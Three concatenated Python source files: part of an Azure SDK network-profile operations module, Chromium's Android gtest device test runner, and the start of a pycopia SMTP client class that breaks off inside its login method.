:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkProfile, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2018_08_01.models.NetworkProfile
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkProfile"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-08-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkProfileName': self._serialize.url("network_profile_name", network_profile_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkProfile', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkProfiles/{networkProfileName}'} # type: ignore
def create_or_update(
self,
resource_group_name, # type: str
network_profile_name, # type: str
parameters, # type: "_models.NetworkProfile"
**kwargs # type: Any
):
# type: (...) -> "_models.NetworkProfile"
"""Creates or updates a network profile.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_profile_name: The name of the network profile.
:type network_profile_name: str
:param parameters: Parameters supplied to the create or update network profile operation.
:type parameters: ~azure.mgmt.network.v2018_08_01.models.NetworkProfile
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkProfile, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2018_08_01.models.NetworkProfile
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkProfile"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-08-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_or_update.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkProfileName': self._serialize.url("network_profile_name", network_profile_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'NetworkProfile')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('NetworkProfile', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('NetworkProfile', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkProfiles/{networkProfileName}'} # type: ignore
def update_tags(
self,
resource_group_name, # type: str
network_profile_name, # type: str
parameters, # type: "_models.TagsObject"
**kwargs # type: Any
):
# type: (...) -> "_models.NetworkProfile"
"""Updates network profile tags.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_profile_name: The name of the network profile.
:type network_profile_name: str
:param parameters: Parameters supplied to update network profile tags.
:type parameters: ~azure.mgmt.network.v2018_08_01.models.TagsObject
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkProfile, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2018_08_01.models.NetworkProfile
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkProfile"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-08-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_tags.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkProfileName': self._serialize.url("network_profile_name", network_profile_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'TagsObject')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkProfile', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkProfiles/{networkProfileName}'} # type: ignore
def list_all(
self,
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.NetworkProfileListResult"]
"""Gets all the network profiles in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkProfileListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2018_08_01.models.NetworkProfileListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkProfileListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-08-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_all.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkProfileListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/networkProfiles'} # type: ignore
def list(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.NetworkProfileListResult"]
"""Gets all network profiles in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkProfileListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2018_08_01.models.NetworkProfileListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkProfileListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-08-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkProfileListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkProfiles'} # type: ignore
| |
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import os
from pylib import constants
from pylib import ports
from pylib.base import test_run
from pylib.device import device_errors
from pylib.gtest import gtest_test_instance
from pylib.local import local_test_server_spawner
from pylib.local.device import local_device_environment
from pylib.local.device import local_device_test_run
from pylib.utils import apk_helper
from pylib.utils import device_temp_file
_COMMAND_LINE_FLAGS_SUPPORTED = True
_EXTRA_COMMAND_LINE_FILE = (
'org.chromium.native_test.ChromeNativeTestActivity.CommandLineFile')
_EXTRA_COMMAND_LINE_FLAGS = (
'org.chromium.native_test.ChromeNativeTestActivity.CommandLineFlags')
_EXTRA_ENABLE_TEST_SERVER_SPAWNER = (
'org.chromium.native_test.ChromeNativeTestInstrumentationTestRunner'
'.EnableTestServerSpawner')
_MAX_SHARD_SIZE = 256
# TODO(jbudorick): Move this up to the test instance if the net test server is
# handled outside of the APK for the remote_device environment.
_SUITE_REQUIRES_TEST_SERVER_SPAWNER = [
'content_unittests', 'content_browsertests', 'net_unittests', 'unit_tests'
]
class _ApkDelegate(object):
def __init__(self, apk):
self._apk = apk
self._package = apk_helper.GetPackageName(self._apk)
self._runner = apk_helper.GetInstrumentationName(self._apk)
self._component = '%s/%s' % (self._package, self._runner)
self._enable_test_server_spawner = False
def EnableTestServerSpawner(self):
self._enable_test_server_spawner = True
def Install(self, device):
device.Install(self._apk)
def RunWithFlags(self, device, flags, **kwargs):
with device_temp_file.DeviceTempFile(device.adb) as command_line_file:
device.WriteFile(command_line_file.name, '_ %s' % flags)
extras = {
_EXTRA_COMMAND_LINE_FILE: command_line_file.name,
}
if self._enable_test_server_spawner:
extras[_EXTRA_ENABLE_TEST_SERVER_SPAWNER] = '1'
return device.StartInstrumentation(
self._component, extras=extras, raw=False, **kwargs)
def Clear(self, device):
device.ClearApplicationState(self._package)
class _ExeDelegate(object):
def __init__(self, exe, tr):
self._exe_host_path = exe
self._exe_file_name = os.path.split(exe)[-1]
self._exe_device_path = '%s/%s' % (
constants.TEST_EXECUTABLE_DIR, self._exe_file_name)
deps_host_path = self._exe_host_path + '_deps'
if os.path.exists(deps_host_path):
self._deps_host_path = deps_host_path
self._deps_device_path = self._exe_device_path + '_deps'
else:
self._deps_host_path = None
self._test_run = tr
def EnableTestServerSpawner(self):
pass
def Install(self, device):
# TODO(jbudorick): Look into merging this with normal data deps pushing if
# executables become supported on nonlocal environments.
host_device_tuples = [(self._exe_host_path, self._exe_device_path)]
if self._deps_host_path:
host_device_tuples.append((self._deps_host_path, self._deps_device_path))
device.PushChangedFiles(host_device_tuples)
def RunWithFlags(self, device, flags, **kwargs):
cmd = [
self._test_run.GetTool(device).GetTestWrapper(),
self._exe_device_path,
flags,
]
cwd = constants.TEST_EXECUTABLE_DIR
env = {
'LD_LIBRARY_PATH':
'%s/%s_deps' % (constants.TEST_EXECUTABLE_DIR, self._exe_file_name),
}
try:
gcov_strip_depth = os.environ['NATIVE_COVERAGE_DEPTH_STRIP']
external = device.GetExternalStoragePath()
env['GCOV_PREFIX'] = '%s/gcov' % external
env['GCOV_PREFIX_STRIP'] = gcov_strip_depth
except (device_errors.CommandFailedError, KeyError):
pass
# TODO(jbudorick): Switch to just RunShellCommand once perezju@'s CL
# for long shell commands lands.
with device_temp_file.DeviceTempFile(device.adb) as script_file:
script_contents = ' '.join(cmd)
logging.info('script contents: %r' % script_contents)
device.WriteFile(script_file.name, script_contents)
output = device.RunShellCommand(['sh', script_file.name], cwd=cwd,
env=env, **kwargs)
return output
def Clear(self, device):
try:
device.KillAll(self._exe_file_name, blocking=True, timeout=30, retries=0)
except device_errors.CommandFailedError:
# Raised if there is no process with the given name, which in this case
# is all we care about.
pass
class LocalDeviceGtestRun(local_device_test_run.LocalDeviceTestRun):
def __init__(self, env, test_instance):
assert isinstance(env, local_device_environment.LocalDeviceEnvironment)
assert isinstance(test_instance, gtest_test_instance.GtestTestInstance)
super(LocalDeviceGtestRun, self).__init__(env, test_instance)
if self._test_instance.apk:
self._delegate = _ApkDelegate(self._test_instance.apk)
elif self._test_instance.exe:
self._delegate = _ExeDelegate(self, self._test_instance.exe)
#override
def TestPackage(self):
return self._test_instance._suite
#override
def SetUp(self):
def individual_device_set_up(dev, host_device_tuples):
# Install test APK.
self._delegate.Install(dev)
# Push data dependencies.
external_storage = dev.GetExternalStoragePath()
host_device_tuples = [
(h, d if d is not None else external_storage)
for h, d in host_device_tuples]
dev.PushChangedFiles(host_device_tuples)
if self.TestPackage() in _SUITE_REQUIRES_TEST_SERVER_SPAWNER:
self._delegate.EnableTestServerSpawner()
self._env.parallel_devices.pMap(individual_device_set_up,
self._test_instance.GetDataDependencies())
#override
def _ShouldShard(self):
return True
#override
def _CreateShards(self, tests):
device_count = len(self._env.devices)
shards = []
for i in xrange(0, device_count):
unbounded_shard = tests[i::device_count]
shards += [unbounded_shard[j:j+_MAX_SHARD_SIZE]
for j in xrange(0, len(unbounded_shard), _MAX_SHARD_SIZE)]
return [':'.join(s) for s in shards]
#override
def _GetTests(self):
tests = self._delegate.RunWithFlags(
self._env.devices[0], '--gtest_list_tests')
tests = gtest_test_instance.ParseGTestListTests(tests)
tests = self._test_instance.FilterTests(tests)
return tests
#override
def _RunTest(self, device, test):
# Run the test.
output = self._delegate.RunWithFlags(device, '--gtest_filter=%s' % test,
timeout=900, retries=0)
self._delegate.Clear(device)
# Parse the output.
# TODO(jbudorick): Transition test scripts away from parsing stdout.
results = self._test_instance.ParseGTestOutput(output)
return results
#override
def TearDown(self):
pass
| |
#!/usr/bin/python3.4
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
'''SMTP/ESMTP client class.
This should follow RFC 821 (SMTP), RFC 1869 (ESMTP), RFC 2554 (SMTP
Authentication) and RFC 2487 (Secure SMTP over TLS).
Notes:
Please remember, when doing ESMTP, that the names of the SMTP service
extensions are NOT the same thing as the option keywords for the RCPT
and MAIL commands!
Example:
>>> import smtplib
>>> s=smtplib.SMTP("localhost")
>>> print s.help()
This is Sendmail version 8.8.4
Topics:
HELO EHLO MAIL RCPT DATA
RSET NOOP QUIT HELP VRFY
EXPN VERB ETRN DSN
For more info use "HELP <topic>".
To report bugs in the implementation send email to
sendmail-bugs@sendmail.org.
For local information send email to Postmaster at your site.
End of HELP info
>>> s.putcmd(b"vrfy","someone@here")
>>> s.getreply()
(250, "Somebody OverHere <somebody@here.my.org>")
>>> s.quit()
'''
# Author: The Dragon De Monsyne <dragondm@integral.org>
# ESMTP support, test code and doc fixes added by
# Eric S. Raymond <esr@thyrsus.com>
# Better RFC 821 compliance (MAIL and RCPT, and CRLF in data)
# by Carey Evans <c.evans@clear.net.nz>, for picky mail servers.
# RFC 2554 (authentication) support by Gerhard Haering <gerhard@bigfoot.de>.
#
# This was modified from the Python 1.5 library HTTP lib.
#
# Extensive modifications by Keith Dart <kdart@kdart.com>.
import re
from email.utils import parseaddr
import types
import base64
import hmac
from errno import EINTR, ECONNREFUSED
from io import BytesIO
import socket
from pycopia.OS import scheduler
SMTP_PORT = 25
CRLF=b"\r\n"
DOTCRLF=b".\r\n"
OLDSTYLE_AUTH = re.compile(r"auth=(.*)", re.I)
def encode_base64(s, eol=None):
return "".join(base64.encodestring(s).split("\n"))
# Exception classes used by this module.
class SMTPException(Exception):
"""Base class for all exceptions raised by this module."""
class SMTPServerDisconnected(SMTPException):
"""Not connected to any SMTP server.
This exception is raised when the server unexpectedly disconnects,
or when an attempt is made to use the SMTP instance before
connecting it to a server.
"""
class SMTPResponseException(SMTPException):
"""Base class for all exceptions that include an SMTP error code.
These exceptions are generated in some instances when the SMTP
server returns an error code. The error code is stored in the
`smtp_code` attribute of the error, and the `smtp_error` attribute
is set to the error message.
"""
def __init__(self, code, msg):
self.smtp_code = code
self.smtp_error = msg
self.args = (code, msg)
class SMTPSenderRefused(SMTPResponseException):
"""Sender address refused.
In addition to the attributes set by on all SMTPResponseException
exceptions, this sets `sender` to the string that the SMTP refused.
"""
def __init__(self, code, msg, sender):
self.smtp_code = code
self.smtp_error = msg
self.sender = sender
self.args = (code, msg, sender)
class SMTPRecipientsRefused(SMTPException):
"""All recipient addresses refused.
The errors for each recipient are accessible through the attribute
'recipients', which is a dictionary of exactly the same sort as
SMTP.sendmail() returns.
"""
def __init__(self, recipients):
self.recipients = recipients
self.args = ( recipients,)
class SMTPDataError(SMTPResponseException):
"""The SMTP server didn't accept the data."""
class SMTPConnectError(SMTPResponseException):
"""Error during connection establishment."""
class SMTPHeloError(SMTPResponseException):
"""The server refused our HELO reply."""
class SMTPAuthenticationError(SMTPResponseException):
"""Authentication error.
Most probably the server didn't accept the username/password
combination provided.
"""
class SSLFakeSocket(object):
"""A fake socket object that really wraps a SSLObject.
It only supports what is needed in smtplib.
"""
def __init__(self, realsock, sslobj):
self.realsock = realsock
self.sslobj = sslobj
def send(self, str):
self.sslobj.write(str)
return len(str)
sendall = send
def close(self):
self.realsock.close()
class SSLFakeFile(object):
"""A fake file like object that really wraps a SSLObject.
It only supports what is needed in smtplib.
"""
def __init__( self, sslobj):
self.sslobj = sslobj
def readline(self):
str = ""
chr = None
while chr != "\n":
chr = self.sslobj.read(1)
str += chr
return str
def close(self):
pass
def quoteaddr(addr):
"""Quote a subset of the email addresses defined by RFC 821.
"""
m=parseaddr(addr)[1]
return "<%s>" % m
def quotedata(data):
"""Quote data for email.
Double leading '.', and change Unix newline '\\n', or Mac '\\r' into
Internet CRLF end-of-line.
"""
return re.sub(r'(?m)^\.', '..',
re.sub(r'(?:\r\n|\n|\r(?!\n))', CRLF, data))
class SMTP(object):
"""This class manages a connection to an SMTP or ESMTP server.
SMTP objects have the following attributes::
helo_resp
This is the message given by the server in response to the
most recent HELO command.
ehlo_resp
This is the message given by the server in response to the
most recent EHLO command. This is usually multiline.
does_esmtp
This is a True value _after you do an EHLO command, if the
server supports ESMTP.
esmtp_features
This is a dictionary, which, if the server supports ESMTP,
will _after you do an EHLO command, contain the names of the
SMTP service extensions this server supports, and their
parameters (if any).
Note, all extension names are mapped to lower case in the
dictionary.
See each method's docstrings for details. In general, there is a
method of the same name to perform each SMTP command. There is also a
method called 'sendmail' that will do an entire mail transaction.
"""
file = None
helo_resp = None
ehlo_resp = None
does_esmtp = 0
def __init__(self, host='', port=25, bindto=None, logfile=None):
"""Initialize a new instance.
If specified, `host` is the name of the remote host to which to
connect. If specified, `port` specifies the port to which to connect.
By default, smtplib.SMTP_PORT is used. An SMTPConnectError is raised
if the specified `host` doesn't respond correctly. """
self.host = host
self.port = port
self._bindto = bindto
self.logfile = logfile
self.esmtp_features = {}
if host:
(code, msg) = self.connect(host, port, bindto)
if code != 220:
raise SMTPConnectError(code, msg)
def __repr__(self):
return "%s(%s, %d)" % (self.__class__.__name__, self.host, self.port)
def set_logfile(self, logfile):
self.logfile = logfile
def connect(self, host='localhost', port=0, bindto=None, retries=3):
"""Connect to a host on a given port.
If the hostname ends with a colon (`:`) followed by a number, and
there is no port specified, that suffix will be stripped off and the
number interpreted as the port number to use.
Note: This method is automatically invoked by __init__, if a host is
specified during instantiation.
"""
if not port and (host.find(':') == host.rfind(':')):
i = host.rfind(':')
if i >= 0:
host, port = host[:i], host[i+1:]
try: port = int(port)
except ValueError:
raise socket.error("nonnumeric port")
if not port:
port = SMTP_PORT
if self.logfile:
self.logfile.write('attempting SMTP.connect: %s %d\n' % (host, port))
msg = "getaddrinfo returns an empty list"
self.sock = None
for res in socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
try:
self.sock = socket.socket(af, socktype, proto)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if self.logfile:
self.logfile.write('SMTP.connect: %s %d\n' % (host, port))
if bindto:
self.sock.bind((bindto, socket.IPPORT_USERRESERVED))
self._bindto = bindto
self._connect(sa, retries)
except socket.error as msg:
if self.logfile:
self.logfile.write('SMTP.connect fail: %s %d\n' % (host, port))
if self.sock:
self.sock.close()
self.sock = None
continue
break
if not self.sock:
raise socket.error(msg)
(code, msg) = self.getreply()
if self.logfile:
self.logfile.write('SMTP.connect: %s %d\n' % (host, port))
return (code, msg)
def _connect(self, addr, retries):
retry = 0
while retry < retries:
try:
self.sock.connect(addr)
except socket.error as msg:
if msg[0] == ECONNREFUSED: # might be busy
scheduler.sleep(2)
continue
else:
raise
else:
return
retry += 1
def send(self, s):
"""Send string to the server."""
if self.logfile:
self.logfile.write(b'send: %r\n' % (s,))
if self.sock:
try:
self.sock.sendall(s)
except socket.error:
self.close()
raise SMTPServerDisconnected('Server not connected')
else:
raise SMTPServerDisconnected('please invoke connect() first')
def putcmd(self, cmd, args=""):
"""Send a command to the server."""
if args == "":
out = b'%s%s' % (cmd, CRLF)
else:
out = b'%s %s%s' % (cmd, args, CRLF)
self.send(out.encode("ascii"))
def getreply(self):
"""Get a reply from the server.
Returns a tuple consisting of:
- server response code (e.g. '250', or such, if all goes well)
Note: returns -1 if it can't read response code.
- server response string corresponding to response code (multiline
responses are converted to a single, multiline string).
Raises SMTPServerDisconnected if end-of-file is reached.
"""
resp=[]
if self.file is None:
self.file = self.sock.makefile('rb')
while 1:
try:
line = self.file.readline()
except IOError as err:
if err[0] == EINTR:
continue
else:
raise
if line == '':
self.close()
raise SMTPServerDisconnected("Connection unexpectedly closed")
if self.logfile:
self.logfile.write('reply: %r\n' % (line,))
resp.append(line[4:].strip())
code=line[:3]
# Check that the error code is syntactically correct.
# Don't attempt to read a continuation line if it is broken.
try:
errcode = int(code)
except ValueError:
errcode = -1
break
# Check if multiline response.
if line[3:4]!="-":
break
errmsg = b"\n".join(resp)
if self.logfile:
self.logfile.write('reply: retcode (%s); Msg: %s\n' % (errcode,errmsg))
return errcode, errmsg
def docmd(self, cmd, args=""):
"""Send a command, and return its response code."""
self.putcmd(cmd, args)
return self.getreply()
# std smtp commands
def helo(self, name=''):
"""SMTP 'helo' command.
Hostname to send for this command defaults to the FQDN of the local
host.
"""
name = name or self._bindto
if name:
self.putcmd(b"helo", name)
else:
self.putcmd(b"helo", socket.getfqdn())
(code,msg)=self.getreply()
self.helo_resp=msg
return (code,msg)
def ehlo(self, name=''):
""" SMTP 'ehlo' command.
Hostname to send for this command defaults to the FQDN of the local
host.
"""
self.esmtp_features = {}
name = name or self._bindto
if name:
self.putcmd(b"ehlo", name)
else:
self.putcmd(b"ehlo", socket.getfqdn())
(code,msg)=self.getreply()
# According to RFC1869 some (badly written)
# MTA's will disconnect on an ehlo. Toss an exception if
# that happens -ddm
if code == -1 and len(msg) == 0:
self.close()
raise SMTPServerDisconnected("Server not connected")
self.ehlo_resp=msg
if code != 250:
return (code,msg)
self.does_esmtp=1
#parse the ehlo response -ddm
resp=self.ehlo_resp.split('\n')
del resp[0]
for each in resp:
# To be able to communicate with as many SMTP servers as possible,
# we have to take the old-style auth advertisement into account,
# because:
# 1) Else our SMTP feature parser gets confused.
# 2) There are some servers that only advertise the auth methods we
# support using the old style.
auth_match = OLDSTYLE_AUTH.match(each)
if auth_match:
# This doesn't remove duplicates, but that's no problem
self.esmtp_features["auth"] = self.esmtp_features.get("auth", "") \
+ " " + auth_match.groups(0)[0]
continue
# RFC 1869 requires a space between ehlo keyword and parameters.
# It's actually stricter, in that only spaces are allowed between
# parameters, but were not going to check for that here. Note
# that the space isn't present if there are no parameters.
m=re.match(r'(?P<feature>[A-Za-z0-9][A-Za-z0-9\-]*)',each)
if m:
feature=m.group("feature").lower()
params=m.string[m.end("feature"):].strip()
if feature == "auth":
self.esmtp_features[feature] = self.esmtp_features.get(feature, "") \
+ " " + params
else:
self.esmtp_features[feature]=params
return (code,msg)
def has_extn(self, opt):
"""Does the server support a given SMTP service extension?"""
return opt.lower() in self.esmtp_features
def help(self, args=''):
"""SMTP 'help' command.
Returns help text from server."""
self.putcmd(b"help", args)
return self.getreply()
def rset(self):
"""SMTP 'rset' command -- resets session."""
return self.docmd("rset")
def noop(self):
"""SMTP 'noop' command -- doesn't do anything :>"""
return self.docmd("noop")
def mail(self,sender, options=None):
"""SMTP 'mail' command -- begins mail xfer session."""
optionlist = ''
if options and self.does_esmtp:
optionlist = ' ' + ' '.join(options)
self.putcmd(b"mail", b"FROM:%s%s" % (quoteaddr(sender) ,optionlist))
return self.getreply()
def rcpt(self,recip, options=None):
"""SMTP 'rcpt' command -- indicates 1 recipient for this mail."""
optionlist = ''
if options and self.does_esmtp:
optionlist = ' ' + ' '.join(options)
self.putcmd(b"rcpt", b"TO:%s%s" % (quoteaddr(recip),optionlist))
return self.getreply()
def data(self,msg):
"""SMTP 'DATA' command -- sends message data to server.
Automatically quotes lines beginning with a period per rfc821.
Raises SMTPDataError if there is an unexpected reply to the
DATA command; the return value from this method is the final
response code received when the all data is sent.
"""
self.putcmd(b"data")
(code,repl)=self.getreply()
if self.logfile:
self.logfile.write("data: %s %s\n" % (code,repl))
if code != 354:
raise SMTPDataError(code,repl)
else:
q = quotedata(msg)
if q[-2:] != CRLF:
q += CRLF
q += DOTCRLF
self.send(q)
(code, msg)=self.getreply()
if self.logfile:
self.logfile.write("data: %s %r\n" % (code,msg))
return (code,msg)
def verify(self, address):
"""SMTP 'verify' command -- checks for address validity."""
self.putcmd(b"vrfy", quoteaddr(address))
return self.getreply()
# a.k.a.
vrfy=verify
def expn(self, address):
"""SMTP 'verify' command -- checks for address validity."""
self.putcmd(b"expn", quoteaddr(address))
return self.getreply()
# some useful methods
def login(self, user, password):
"""Log in on an SMTP server that requires authentication.
The arguments are:
- user: The user name to authenticate with.
- password: The password for the authentication.
If there has been no previous EHLO or HELO command this session, this
method tries ESMTP EHLO first.
This method will return normally if the authentication was successful.
This method may raise the following exceptions:
SMTPHeloError The server didn't reply properly to
the helo greeting.
SMTPAuthenticationError The server didn't accept the username/
password combination.
SMTPException No suitable authentication method was
found.
"""
def encode_cram_md5(challenge, user, password):
challenge = base64.decodestring(challenge)
response = user + " " + hmac.HMAC(password, challenge).hexdigest()
return encode_base64(response, eol="")
def encode_plain(user, password):
return encode_base64("%s\0%s\0%s" % (user, user, password), eol="")
AUTH_PLAIN = b"PLAIN"
AUTH_CRAM_MD5 = b"CRAM-MD5"
AUTH_LOGIN = b"LOGIN"
if self.helo_resp is None and self.ehlo_resp is None:
if not (200 <= self.ehlo()[0] <= 299):
(code, resp) = self.helo()
if not (200 <= code <= 299):
raise SMTPHeloError(code, resp)
if not self.has_extn("auth"):
raise SMTPException("SMTP AUTH extension not supported by server.")
# Authentication methods the server supports:
authlist = self.esmtp_features["auth"].split()
# List of authentication methods we support: from preferred to
# less preferred methods. Except for the purpose of testing the weaker
# ones, we prefer stronger methods like CRAM-MD5:
preferred_auths = [AUTH_CRAM_MD5, AUTH_PLAIN, AUTH_LOGIN]
# Determine the authentication method we'll use
authmethod = None
for method in preferred_auths:
if method in authlist:
authmethod = method
break
if authmethod == AUTH_CRAM_MD5:
(code, resp) = self.docmd("AUTH", AUTH_CRAM_MD5)
if code == 503:
# 503 == 'Error: already authenticated'
return (code, resp)
(code, resp) = self.docmd(encode_cram_md5(resp, user, password))
elif authmethod == AUTH_PLAIN:
(code, resp) = self.docmd("AUTH",
